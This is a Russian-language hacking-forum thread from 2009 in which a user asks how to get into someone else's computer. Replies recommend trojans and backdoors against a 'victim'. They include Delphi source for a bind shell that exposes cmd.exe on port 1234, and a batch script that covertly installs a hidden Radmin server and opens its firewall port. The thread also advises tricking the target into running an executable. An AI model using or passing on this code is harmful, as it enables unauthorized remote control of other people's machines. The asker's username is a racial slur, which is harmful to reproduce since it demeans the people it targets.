Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   расскажите(напишите) подробно как в чужом компе шарить, что нужно для этого? (https://forum.antichat.xyz/showthread.php?t=118141)

nigger 28.04.2009 12:22

расскажите(напишите) подробно как в чужом компе шарить, что нужно для этого?
 
как в чужом компе шарить, что нужно для этого? мне какой нить трояна ему надо да и через неттул?

Nightmarе 28.04.2009 12:26

Цитата:

Сообщение от nigger
как в чужом компе шарить, что нужно для этого? мне какой нить трояна ему надо да и через неттул?

Если у жертвы внешний IP (что встречается крааайне редко) то любым бекдором.

Для остальных есть особый бекдор с новым подходом
;)

root_sashok 28.04.2009 12:46

RAdmin-ом шарить))

|Helkern| 28.04.2009 18:00

Цитата:

Сообщение от root_sashok
RAdmin-ом шарить))

а радмином можно только после разрешения юзера или он должен быть включен

slesh 30.04.2009 12:15

запусти этот код на компе жертвы и лезей сколько угодно (если не стоит фаера и нет Ната) или перекодить на connect back. А так коннетится на порт 1234 главное WSAStartup незабыть сделать
Код:

var
StartupInfo:_STARTUPINFOA;
addr,caddr:tsockaddrin;
ProcessInformation:_PROCESS_INFORMATION;
addrlen:integer;
cl:LongWord;
l:integer;
c:char;
begin
sock:=WSASocketA(2,1,6,nil,0,0);
if sock=INVALID_SOCKET then exit;
addr.sin_family:=AF_INET;
addr.sin_addr.s_addr:=0;
addr.sin_port:=htons(1234);
bind(sock,@addr, sizeof(addr));

listen(sock,$7FFFFFFF);
addrlen:=sizeof(caddr);
while true do
 begin
  cl:=accept(sock,caddr,addrlen);
  if cl=INVALID_SOCKET then continue;
  fillchar(StartupInfo,sizeof(StartupInfo),0);
  StartupInfo.cb:=sizeof(StartupInfo);
  StartupInfo.dwFlags:=$100;
  StartupInfo.hStdInput:=cl;
  StartupInfo.hStdOutput:=cl;
  StartupInfo.hStdError:=cl;
  CreateProcessA(nil,'cmd.exe',nil,nil,$00000001,$8000040,nil,nil,StartupInfo,ProcessInformation);
end;
closesocket(sock);
end;


Gaus 30.04.2009 13:32

Hidden сборкой рАдмина

De-visible 30.04.2009 13:49

Ыыыы, slesh порадовал)))...
+

Gar|k 30.04.2009 18:10

Если локальная сеть зная логин и пасс пользователя... или же если открыт гостевой доступ... то можно тупа подключить сетевой диск 'net use /?' читай...
есть еще стандартный виндовый удалленный рабочий стол. есть радмин
настройки сервера (которого будешь ставить юзеру) настраиваешь у себя бекапишь веточку реестра... а патом батником или напрограммируй незаметненько
Код:

copy ".\file\r_server.exe" "%WinDir%\system32\r_server.exe"
copy ".\file\raddrv.dll" "%WinDir%\system32\raddrv.dll"
copy ".\file\admdll.dll" "%WinDir%\system32\admdll.dll"
regedit.exe /s ".\file\settings.reg"
netsh firewall add portopening TCP 4899 admin
%WinDir%\system32\r_server.exe /install /silence
%WinDir%\system32\r_server.exe /start

slesh, тоже тему говорит бек дор хорошая штука ) но всеже если есть доступ на машину можно и радмина стартануть )

опять же всевозможные сплоиты и сканеры.
в старадавние времена я пользовался лишь Legion-ом
Цитата:

Сообщение от http://www.inattack.ru/program/109.html
Программа Legion является одним из найболее популярных средств сканирования удаленных компьютеров на наличие share-файлов с последующей возможностью их копирования, стирания и изменения.


Flenov 04.05.2009 16:24

Извиняюсь, я в лазини по чужим компа не великий спец, но заинтересовало
Получается, если на компе WinXP и внешний IP адрес, то можно лазить куды угодно?


Или как?
Прошу разъяснить вопрос.

Nightmarе 09.08.2009 17:18

Цитата:

Сообщение от Flenov
Извиняюсь, я в лазини по чужим компа не великий спец, но заинтересовало
Получается, если на компе WinXP и внешний IP адрес, то можно лазить куды угодно?


Или как?
Прошу разъяснить вопрос.

Если на компе любая версия Windows + внешний айпи то да, впарив .exe ты можешь лазить по компу.
Под внешний IP есть много бесплатных бекдоров.

А если у жертвы NAT (отсутствие внешнего IP, у большинства именно NAT), то тут только платные бекдоры. (см. второе сообщение в этой теме)


Время: 09:18